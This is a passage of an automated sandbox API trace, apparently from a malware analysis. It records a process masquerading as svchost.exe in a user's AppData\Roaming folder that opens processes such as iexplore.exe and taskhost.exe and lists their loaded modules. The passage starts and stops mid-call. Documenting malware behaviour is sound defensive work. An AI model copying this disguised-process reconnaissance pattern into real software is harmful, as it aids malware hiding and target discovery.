lpmodinfo=0x240d0d0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.286] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.286] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.286] CoTaskMemFree (pv=0xd93200) [0073.286] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.286] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.287] CoTaskMemFree (pv=0xd93200) [0073.287] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x240f290, cb=0x18 | out: lpmodinfo=0x240f290*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.287] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.287] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.288] CoTaskMemFree (pv=0xd93200) [0073.288] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.288] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.289] CoTaskMemFree (pv=0xd93200) [0073.289] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2411460, cb=0x18 | out: lpmodinfo=0x2411460*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.289] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.289] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.290] CoTaskMemFree (pv=0xd93200) [0073.290] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.290] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.291] CoTaskMemFree (pv=0xd93200) [0073.291] CloseHandle (hObject=0x214) returned 1 [0073.292] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.292] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2ac) returned 0x214 [0073.292] EnumProcessModules (in: hProcess=0x214, lphModule=0x2413b80, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2413b80, lpcbNeeded=0x23ee40) returned 1 [0073.293] GetModuleInformation (in: hProcess=0x214, hModule=0xf00000, lpmodinfo=0x2413df0, cb=0x18 | out: lpmodinfo=0x2413df0*(lpBaseOfDll=0xf00000, SizeOfImage=0xa6000, EntryPoint=0xf01c9a)) returned 1 [0073.293] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.293] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xf00000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="iexplore.exe") returned 0xc [0073.293] CoTaskMemFree (pv=0xd93200) [0073.293] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.293] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xf00000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0073.294] CoTaskMemFree (pv=0xd93200) [0073.294] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2416020, cb=0x18 | out: lpmodinfo=0x2416020*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.294] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.294] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.295] CoTaskMemFree (pv=0xd93200) [0073.295] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.295] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.295] CoTaskMemFree (pv=0xd93200) [0073.295] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24181e0, cb=0x18 | out: lpmodinfo=0x24181e0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.296] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.296] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.296] CoTaskMemFree (pv=0xd93200) [0073.296] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.296] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.297] CoTaskMemFree (pv=0xd93200) [0073.297] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x241a3a0, cb=0x18 | out: lpmodinfo=0x241a3a0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.297] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.297] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.298] CoTaskMemFree (pv=0xd93200) [0073.298] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.298] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.298] CoTaskMemFree (pv=0xd93200) [0073.299] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x241c570, cb=0x18 | out: lpmodinfo=0x241c570*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.299] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.299] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.300] CoTaskMemFree (pv=0xd93200) [0073.300] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.300] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.300] CoTaskMemFree (pv=0xd93200) [0073.300] CloseHandle (hObject=0x214) returned 1 [0073.302] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x214 [0073.302] EnumProcessModules (in: hProcess=0x214, lphModule=0x241eca8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x241eca8, lpcbNeeded=0x23ee40) returned 1 [0073.306] EnumProcessModules (in: hProcess=0x214, lphModule=0x241eec0, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x241eec0, lpcbNeeded=0x23ee40) returned 1 [0073.320] GetModuleInformation (in: hProcess=0x214, hModule=0xff130000, lpmodinfo=0x241f330, cb=0x18 | out: lpmodinfo=0x241f330*(lpBaseOfDll=0xff130000, SizeOfImage=0x14000, EntryPoint=0xff132ce0)) returned 1 [0073.321] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.321] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff130000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="taskhost.exe") returned 0xc [0073.321] CoTaskMemFree (pv=0xd93200) [0073.321] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.321] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff130000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe")) returned 0x20 [0073.322] CoTaskMemFree (pv=0xd93200) [0073.322] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2421538, cb=0x18 | out: lpmodinfo=0x2421538*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.322] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.322] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.323] CoTaskMemFree (pv=0xd93200) [0073.323] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.323] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.323] CoTaskMemFree (pv=0xd93200) [0073.323] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x24236f8, cb=0x18 | out: lpmodinfo=0x24236f8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0073.324] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.324] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0073.324] CoTaskMemFree (pv=0xd93200) [0073.325] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.325] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0073.325] CoTaskMemFree (pv=0xd93200) [0073.325] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x24258c8, cb=0x18 | out: lpmodinfo=0x24258c8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0073.325] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.326] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0073.326] CoTaskMemFree (pv=0xd93200) [0073.326] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.326] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0073.327] CoTaskMemFree (pv=0xd93200) [0073.327] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2427a98, cb=0x18 | out: lpmodinfo=0x2427a98*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0073.327] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.327] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0073.328] CoTaskMemFree (pv=0xd93200) [0073.328] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.328] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0073.329] CoTaskMemFree (pv=0xd93200) [0073.329] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2429cb0, cb=0x18 | out: lpmodinfo=0x2429cb0*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0073.329] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.329] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0073.330] CoTaskMemFree (pv=0xd93200) [0073.330] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.330] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0073.331] CoTaskMemFree (pv=0xd93200) [0073.331] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x242be70, cb=0x18 | out: lpmodinfo=0x242be70*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0073.331] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.331] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0073.332] CoTaskMemFree (pv=0xd93200) [0073.332] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.332] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0073.333] CoTaskMemFree (pv=0xd93200) [0073.333] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x242e030, cb=0x18 | out: lpmodinfo=0x242e030*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0073.333] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.333] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0073.334] CoTaskMemFree (pv=0xd93200) [0073.334] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.334] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0073.335] CoTaskMemFree (pv=0xd93200) [0073.335] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24301f0, cb=0x18 | out: lpmodinfo=0x24301f0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0073.336] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.336] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0073.337] CoTaskMemFree (pv=0xd93200) [0073.337] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.337] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0073.338] CoTaskMemFree (pv=0xd93200) [0073.338] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2432438, cb=0x18 | out: lpmodinfo=0x2432438*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0073.338] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.338] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0073.339] CoTaskMemFree (pv=0xd93200) [0073.339] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.339] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0073.340] CoTaskMemFree (pv=0xd93200) [0073.340] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x24345f8, cb=0x18 | out: lpmodinfo=0x24345f8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0073.341] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.341] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0073.342] CoTaskMemFree (pv=0xd93200) [0073.342] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.342] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0073.343] CoTaskMemFree (pv=0xd93200) [0073.343] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x24367b8, cb=0x18 | out: lpmodinfo=0x24367b8*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0073.344] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.344] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0073.345] CoTaskMemFree (pv=0xd93200) [0073.345] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.345] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0073.346] CoTaskMemFree (pv=0xd93200) [0073.346] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x2438988, cb=0x18 | out: lpmodinfo=0x2438988*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0073.347] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.347] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0073.348] CoTaskMemFree (pv=0xd93200) [0073.348] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.348] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0073.349] CoTaskMemFree (pv=0xd93200) [0073.349] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x243ab48, cb=0x18 | out: lpmodinfo=0x243ab48*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0073.350] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.350] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0073.351] CoTaskMemFree (pv=0xd93200) [0073.351] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.352] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0073.353] CoTaskMemFree (pv=0xd93200) [0073.353] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x243cd08, cb=0x18 | out: lpmodinfo=0x243cd08*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0073.360] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.360] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0073.361] CoTaskMemFree (pv=0xd93200) [0073.361] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.361] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0073.362] CoTaskMemFree (pv=0xd93200) [0073.362] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x243eef0, cb=0x18 | out: lpmodinfo=0x243eef0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0073.363] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.363] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0073.365] CoTaskMemFree (pv=0xd93200) [0073.365] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.365] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0073.366] CoTaskMemFree (pv=0xd93200) [0073.366] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x24410b0, cb=0x18 | out: lpmodinfo=0x24410b0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0073.367] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.367] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0073.368] CoTaskMemFree (pv=0xd93200) [0073.368] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.368] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0073.369] CoTaskMemFree (pv=0xd93200) [0073.369] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x2443398, cb=0x18 | out: lpmodinfo=0x2443398*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0073.371] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.371] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0073.372] CoTaskMemFree (pv=0xd93200) [0073.372] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.372] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0073.374] CoTaskMemFree (pv=0xd93200) [0073.374] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3f20000, lpmodinfo=0x2445558, cb=0x18 | out: lpmodinfo=0x2445558*(lpBaseOfDll=0x7fef3f20000, SizeOfImage=0x180000, EntryPoint=0x7fef3f580d0)) returned 1 [0073.375] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.375] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3f20000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="RacEngn.dll") returned 0xb [0073.376] CoTaskMemFree (pv=0xd93200) [0073.376] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.376] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3f20000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RacEngn.dll" (normalized: "c:\\windows\\system32\\racengn.dll")) returned 0x1f [0073.378] CoTaskMemFree (pv=0xd93200) [0073.378] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd2a0000, lpmodinfo=0x2447718, cb=0x18 | out: lpmodinfo=0x2447718*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0073.379] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.379] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0073.380] CoTaskMemFree (pv=0xd93200) [0073.381] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.381] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0073.382] CoTaskMemFree (pv=0xd93200) [0073.382] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9d30000, lpmodinfo=0x24498d8, cb=0x18 | out: lpmodinfo=0x24498d8*(lpBaseOfDll=0x7fef9d30000, SizeOfImage=0x42000, EntryPoint=0x7fef9d317e4)) returned 1 [0073.383] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.383] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9d30000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sqmapi.dll") returned 0xa [0073.385] CoTaskMemFree (pv=0xd93200) [0073.385] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.385] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9d30000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")) returned 0x1e [0073.386] CoTaskMemFree (pv=0xd93200) [0073.386] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa0d0000, lpmodinfo=0x244ba98, cb=0x18 | out: lpmodinfo=0x244ba98*(lpBaseOfDll=0x7fefa0d0000, SizeOfImage=0x12000, EntryPoint=0x7fefa0d1050)) returned 1 [0073.388] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.388] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa0d0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="AEPIC.dll") returned 0x9 [0073.389] CoTaskMemFree (pv=0xd93200) [0073.389] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.389] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa0d0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AEPIC.dll" (normalized: "c:\\windows\\system32\\aepic.dll")) returned 0x1d [0073.391] CoTaskMemFree (pv=0xd93200) [0073.391] GetModuleInformation (in: hProcess=0x214, hModule=0x73ff0000, lpmodinfo=0x244dc58, cb=0x18 | out: lpmodinfo=0x244dc58*(lpBaseOfDll=0x73ff0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.392] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.392] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x73ff0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sfc.dll") returned 0x7 [0073.394] CoTaskMemFree (pv=0xd93200) [0073.394] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.394] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x73ff0000, 